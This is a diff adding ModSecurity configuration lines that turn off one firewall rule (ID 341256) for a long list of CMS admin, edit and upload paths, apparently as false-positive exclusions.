+SecRule REQUEST_FILENAME "/s_search\.php" "phase:2,id:94468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpage\.php" "phase:2,id:94469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/display_property\.aspx" "phase:2,id:94470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin-stats\.php" "phase:2,id:94471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quickscan/8a\.php" "phase:2,id:94472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/creatematchstats\.php" "phase:2,id:94473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add-process\.php" "phase:2,id:94474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/updates\.php" "phase:2,id:94475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login_status\.php" "phase:2,id:94476,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_search\.php" "phase:2,id:94477,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/gravityforms/preview\.php" "phase:2,id:94478,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contmin\.php" "phase:2,id:94479,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_static_cgi\.php" "phase:2,id:94480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ash/default\.php" "phase:2,id:94481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ratesadmin\.php" "phase:2,id:94482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/testamin\.php" "phase:2,id:94483,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dartiframe\.html" "phase:2,id:94484,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jomsocial/profile/edit" "phase:2,id:94485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administratie/pro/servers\.php" "phase:2,id:94486,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/payment\.php" "phase:2,id:94487,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:94488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/update\.php" "phase:2,id:94489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/options\.php" "phase:2,id:94490,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/catalogs/save_element\.php" "phase:2,id:94491,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_modal/save/" "phase:2,id:94492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/favicon\.php" "phase:2,id:94493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/components\.php" "phase:2,id:94494,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/postbagdo\.php" "phase:2,id:94495,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/media\.php" "phase:2,id:94496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/index3\.php" "phase:2,id:94497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portaladmin/edit_annonce1\.php" "phase:2,id:94498,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portaladmin/add_annonce1\.php" "phase:2,id:94499,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms_centralparking\.php" "phase:2,id:94500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_lesson\.php" "phase:2,id:94501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_brochure_edit\.php" "phase:2,id:94502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aboutus-pages_exe\.php" "phase:2,id:94503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_alter\.php" "phase:2,id:94504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/newspro\.cgi" "phase:2,id:94505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/video_edit\.php" "phase:2,id:94506,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/email/test\.php" "phase:2,id:94507,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/groupedit\.php" "phase:2,id:94508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/retail_oordenkings\.edit\.php" "phase:2,id:94509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lesson_edit\.php" "phase:2,id:94510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplate_dhltrack_result\.php" "phase:2,id:94511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/browse_links\.php" "phase:2,id:94512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quote_rads\.php" "phase:2,id:94513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tweet-blender/ws\.php" "phase:2,id:94514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/video_edit\.php" "phase:2,id:94515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save\.json" "phase:2,id:94516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/test\.html" "phase:2,id:94517,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit\.php" "phase:2,id:94518,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/nav-menus\.php" "phase:2,id:94519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-post\.php" "phase:2,id:94520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/portfolio/edit\.php" "phase:2,id:94521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pods/ajax/showform\.php" "phase:2,id:94522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/team/create\.php" "phase:2,id:94523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sage_download\.php" "phase:2,id:94524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/template_content_editresult\.php" "phase:2,id:94525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm/index\.php" "phase:2,id:94526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_brochure_email\.php" "phase:2,id:94527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addlinks\.php" "phase:2,id:94528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminsettings\.php" "phase:2,id:94529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/news/nav\.php" "phase:2,id:94530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addnews\.php" "phase:2,id:94531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/postarticles\.php" "phase:2,id:94532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/contactus\.php" "phase:2,id:94533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/homepagecontent\.php" "phase:2,id:94534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filebrowser/umifilebrowser\.html" "phase:2,id:94535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/coupons_exclusions\.php" "phase:2,id:94536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/voltrank" "phase:2,id:94537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_configvalues\.php" "phase:2,id:94538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/processaddeditproduct\.php" "phase:2,id:94539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:94540,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/builder/postsitedata\.php" "phase:2,id:94541,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/settingsgeneralaction\.php" "phase:2,id:94542,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:94543,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/include/load_page\.php" "phase:2,id:94544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/profile/shopsettings\.jsf" "phase:2,id:94545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:94546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:94547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jupgrade/administrator/index\.php" "phase:2,id:94548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2_configvars_engine\.php" "phase:2,id:94549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bookingcalendar/php/save\.php" "phase:2,id:94550,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/start\.php" "phase:2,id:94551,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplateeditaction\.php" "phase:2,id:94552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settingscontact\.php" "phase:2,id:94553,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property-edit\.php" "phase:2,id:94554,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server/webissues/handler\.php" "phase:2,id:94555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/db_edit\.php" "phase:2,id:94556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/datafeedmanager/adminhtml_datafeedmanager/save" "phase:2,id:94557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/venue-edit\.php" "phase:2,id:94558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:94559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-install\.php" "phase:2,id:94560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/products_add\.php" "phase:2,id:94561,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_uploader\.php" "phase:2,id:94562,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/include/ajax_price\.php" "phase:2,id:94563,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/page_editor/save_page\.php" "phase:2,id:94564,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_prosess\.php" "phase:2,id:94565,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_process\.php" "phase:2,id:94566,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/seopanel/login\.php" "phase:2,id:94567,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:94568,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopperpress/ppt/ajax/actions\.php" "phase:2,id:94569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/spostarbust/images/index\.php" "phase:2,id:94570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/emailxmlasattachment\.ph" "phase:2,id:94571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/console/manage_products\.php" "phase:2,id:94572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/agents/uploader/doupload\.php" "phase:2,id:94573,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:94574,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/textpattern/index\.php" "phase:2,id:94575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filemanager/filemanager\.php" "phase:2,id:94576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagecrop\.php" "phase:2,id:94577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dashboard\.php" "phase:2,id:94578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ie-style\.php" "phase:2,id:94579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/likebox\.php" "phase:2,id:94580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bb_gate\.php" "phase:2,id:94581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imgprod\.php" "phase:2,id:94582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmyvisites\.php" "phase:2,id:94583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editpage\.php" "phase:2,id:94584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_ajax_contact/ajax\.php" "phase:2,id:94585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/artwork/index/upload_file" "phase:2,id:94586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/media/upload\.php" "phase:2,id:94587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:94588,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/a_config_dt\.php" "phase:2,id:94589,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aom/item/index\.php" "phase:2,id:94590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/orders/ordersave\.php" "phase:2,id:94591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/nucleus/index\.php" "phase:2,id:94592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_post\.php" "phase:2,id:94593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/provider/offers\.php" "phase:2,id:94594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/wp-slimstat/wp-slimstat-js\.php" "phase:2,id:94595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editor/sitemanger/index\.php" "phase:2,id:94596,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addclientvideo\.php" "phase:2,id:94597,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/single_upload\.php" "phase:2,id:94598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/betrieb\.php" "phase:2,id:94599,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wiki/lib/exe/fetch\.php" "phase:2,id:94600,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/press-this\.php" "phase:2,id:94601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pagine\.php" "phase:2,id:94602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/order-categories\.php" "phase:2,id:94603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:94604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:94605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:94606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:94607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/raidlogimport/admin/dkp\.php" "phase:2,id:94608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/p\.php" "phase:2,id:94609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/verticalresponse\.php" "phase:2,id:94610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editart\.php" "phase:2,id:94611,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/panel/content/itinerary\.php" "phase:2,id:94612,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/adminmailing\.php" "phase:2,id:94613,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homepageedit\.php" "phase:2,id:94614,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/jobedit\.php" "phase:2,id:94615,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/media-upload\.php" "phase:2,id:94616,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ndxz-studio" "phase:2,id:94617,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ndxzstudio" "phase:2,id:94618,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/json\.php" "phase:2,id:94619,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_salvaxml\.php" "phase:2,id:94620,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/imple\.php" "phase:2,id:94621,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/settings\.php" "phase:2,id:94622,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/destination-edit\.php" "phase:2,id:94623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/posthtml\.php" "phase:2,id:94624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/template_edit\.asp" "phase:2,id:94625,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/question/edit\.php" "phase:2,id:94626,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/menu\.pl" "phase:2,id:94627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_article\.php" "phase:2,id:94628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/update\.php" "phase:2,id:94629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/contactme/xd_receiver\.php" "phase:2,id:94630,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_home\.php" "phase:2,id:94631,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/update-news\.php" "phase:2,id:94632,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:94633,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/linnworks_xml\.php" "phase:2,id:94634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/saveeshop" "phase:2,id:94635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/comments\.php" "phase:2,id:94636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/viewraid\.php" "phase:2,id:94637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/twitter/tweets-grab\.php" "phase:2,id:94638,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/set_label\.php" "phase:2,id:94639,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/profile/register/registerprofile" "phase:2,id:94640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/code_editor\.php" "phase:2,id:94641,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/popeditmarker\.php" "phase:2,id:94642,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/security/access/policy/template\.php" "phase:2,id:94643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modiwats\.php" "phase:2,id:94644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:94645,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
